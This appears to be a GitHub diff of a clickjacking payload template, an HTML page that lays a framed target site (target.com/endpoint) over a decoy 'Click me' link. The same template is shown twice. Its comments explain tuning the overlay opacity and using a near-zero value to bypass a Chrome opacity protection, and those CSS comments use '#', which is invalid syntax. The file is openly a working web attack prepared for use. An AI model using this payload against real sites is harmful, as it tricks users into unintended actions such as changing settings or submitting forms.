righettod · October 5, 2019 08:27 · mateenab · Sep 27, 2022 · fredericgoossens · Dec 13, 2023
diff --git a/clickjacking-payload-template.html b/clickjacking-payload-template.html
 <head>
   <!-- Big up to https://portswigger.net/web-security/clickjacking labs :) -->
   <style>
      .target_website {
      position:relative;
      width:800px;
      height:400px;
      #Set opacity to 0.5 to see overlay allowing preparation of the attack 
      #Set opacity to 0.00001 to made the target frame site transparent and bypass some browser protection on opacity like one in chrome for example
      #See https://www.w3schools.com/css/css_image_transparency.asp
      opacity:0.5;
      z-index:2;
      }
      .decoy_website {
      position:absolute;
      width:800px;
      height:400px;
      z-index:1;
      }
   </style>
 </head>
 <body>
   <div id="decoy_website" class="decoy_website"><a href="#" style="position: absolute; top: 787px; left: 35px;">Click me</a></div>
   <iframe id="target_website" src="https://target.com/endpoint" class="target_website" sandbox="allow-forms"></iframe>
 </body>
	<head>
	<!-- Big up to https://portswigger.net/web-security/clickjacking labs :) -->
	<style>
	.target_website {
	position:relative;
	width:800px;
	height:400px;
	#Set opacity to 0.5 to see overlay allowing preparation of the attack
	#Set opacity to 0.00001 to made the target frame site transparent and bypass some browser protection on opacity like one in chrome for example
	#See https://www.w3schools.com/css/css_image_transparency.asp
	opacity:0.5;
	z-index:2;
	}
	.decoy_website {
	position:absolute;
	width:800px;
	height:400px;
	z-index:1;
	}
	</style>
	</head>
	<body>
	<div id="decoy_website" class="decoy_website"><a href="#" style="position: absolute; top: 787px; left: 35px;">Click me</a></div>
	<iframe id="target_website" src="https://target.com/endpoint" class="target_website" sandbox="allow-forms"></iframe>
	</body>